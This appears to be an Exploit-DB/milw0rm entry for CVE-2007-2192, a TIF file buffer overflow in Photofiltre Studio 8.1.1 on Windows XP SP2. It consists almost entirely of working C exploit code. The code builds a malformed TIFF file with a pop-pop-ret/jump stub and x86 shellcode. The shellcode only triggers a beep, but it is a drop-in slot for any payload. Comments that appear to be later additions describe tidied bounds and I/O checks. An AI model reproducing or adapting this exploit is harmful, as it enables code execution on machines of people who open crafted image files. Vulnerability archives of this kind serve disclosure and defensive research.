- EDB-ID
- 3772
- Проверка EDB
-
- Пройдено
- Автор
- MARSU
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2007-2192
- Дата публикации
- 2007-04-21
/********************************************************************************
* *
* Photofiltre Studio v8.1.1 .TIF File Buffer Overflow *
* *
* *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file. *
* This exploit just beeps (useless but incredibly noisy!!). *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <[email protected]> *
********************************************************************************/
#include "stdio.h"
#include "stdlib.h"
#include <string.h>
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
// 35 bytes of raw machine code (x86, per the header's Windows XP SP2 target).
// main() copies sizeof(beepsp2)-1 bytes, i.e. without the string's NUL terminator.
// The absolute address on the second line is hard-coded for one OS build (see the
// author's comment); the two 16-bit little-endian operands are the Beep parameters.
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C" //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\xD0\x03" //Length \xD0\x03 = 2000 (2 seconds)
"\x00\x00\xC7\x04\x24"
"\x01\x0E" //Frequency \x01\x0E = 3585
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3";
// Malformed TIFF template: 85 lines x 16 bytes = 1360 bytes (plus the string's
// NUL terminator, which main() never writes; it hard-codes the same 1360 count).
// Starts with the little-endian TIFF magic "II*\0" and an IFD offset of 8.
// main() overwrites a slice of this buffer at offset 0xd5 before writing it out.
char tif_file_part1[] =
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00"
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01"
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92"
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;
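/*
 * Entry point: copies the tif_file_part1 template into a local buffer, overwrites
 * a slice of it at offset 0xd5 with the author's 9-byte stub followed by beepsp2,
 * and writes the result to the path given as argv[1].
 *
 * Changes versus the original: memcpy now has a prototype (<string.h>), the slice
 * is bounds-checked against the template before any copy, fwrite()/fclose() results
 * are checked, the usage text names the .tif extension the tool actually produces,
 * and every error path exits non-zero so a caller can tell failure from success.
 *
 * Returns 0 on success, EXIT_FAILURE on a usage error or any I/O failure.
 */
int main(int argc, char* argv[])
{
    /* 0xd5 is the author's chosen position inside the template for the patch. */
    const size_t offset = 0xd5;
    /* sizeof(...) - 1 drops the string literal's NUL; the template is 1360 bytes. */
    const size_t template_len = sizeof(tif_file_part1) - 1;
    const size_t shellcode_len = sizeof(beepsp2) - 1;
    static const char jump_stub[] = "\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43"; //pop pop ret in ??? + jump over EIP
    const size_t stub_len = sizeof(jump_stub) - 1;
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "<prog>";
    /* Sized to the template so no uninitialised tail can ever be written out. */
    char evilbuff[sizeof(tif_file_part1)];
    FILE* tiffile;
    size_t written;

    printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
    printf("[+] Coded and discovered by Marsu <[email protected]>\n");

    if (argc != 2) {
        /* The output is a .tif; the original text said .ttf. */
        printf("[+] Usage: %s <file.tif>\n", prog);
        return EXIT_FAILURE;
    }

    /* Refuse to patch if the stub + shellcode would run past the template. */
    if (offset > template_len || stub_len + shellcode_len > template_len - offset) {
        printf("[-] Patch does not fit in the template.\n");
        return EXIT_FAILURE;
    }

    memcpy(evilbuff, tif_file_part1, template_len);
    memcpy(evilbuff + offset, jump_stub, stub_len);
    memcpy(evilbuff + offset + stub_len, beepsp2, shellcode_len);
    printf("[+] tif_file_part2 patched!\n");

    if ((tiffile = fopen(argv[1], "wb")) == NULL) {
        printf("[-] Unable to access file.\n");
        return EXIT_FAILURE;
    }

    /* fwrite may write short; fclose flushes, so its result matters for a write stream. */
    written = fwrite(evilbuff, 1, template_len, tiffile);
    if (fclose(tiffile) != 0 || written != template_len) {
        printf("[-] Unable to write file.\n");
        return EXIT_FAILURE;
    }

    printf("[+] Done. Have fun!\n");
    return 0;
}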
// milw0rm.com [2007-04-21]